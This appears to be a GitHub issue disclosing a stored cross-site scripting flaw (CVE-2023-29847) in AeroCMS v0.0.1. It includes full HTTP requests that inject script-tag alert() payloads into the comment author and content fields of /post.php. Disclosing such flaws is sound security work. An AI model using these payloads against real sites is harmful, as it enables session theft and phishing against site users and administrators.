Headline
CVE-2023-29847: Stored XSS Vulnerability on AeroCMS v0.0.1 · Issue #11 · MegaTKC/AeroCMS
AeroCMS v0.0.1 was discovered to contain multiple stored cross-site scripting (XSS) vulnerabilities via the comment_author and comment_content parameters at /post.php. These vulnerabilities allow attackers to execute arbitrary web scripts or HTML via a crafted payload.
Description:
I found Stored Cross site scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post comments section “Author” and “Content” field. When I use malicious code or use any xss payload then the browser give me result. Because a browser can not know if the script should be trusted or not.
CMS Version:
v0.0.1
Affected URL:
http://127.0.0.1/AeroCMS/post.php
Steps to Reproduce:
- At first open any post.
- then fill up comments section and your request data will be
POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close
comment_author=test&[email protected]&comment_content=test&create_comment=
- “comment_author” and “comment_content” parameters are vulnerable. Let’s try to use any XSS payload in “comment_author” and “comment_content” parameters and your request data will be
POST /AeroCMS/post.php?p_id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: http://127.0.0.1
Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea
Connection: close
comment_author=test"><script>alert(111)</script>&[email protected]&comment_content=test"><script>alert(‘XSS’)</script>&create_comment=
- Now login admin panel and go to “Comments” Menu
- You will see XSS pop up (If admin approve comment so XSS pop up execute in post section).
Proof of Concept:
You can see the Proof of Concept. which I’ve attached screenshots and video to confirm the vulnerability.
Impact:
Attackers can make use of this to conduct attacks like phishing, steal sessions etc.
Let me know if any further info is required.
Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/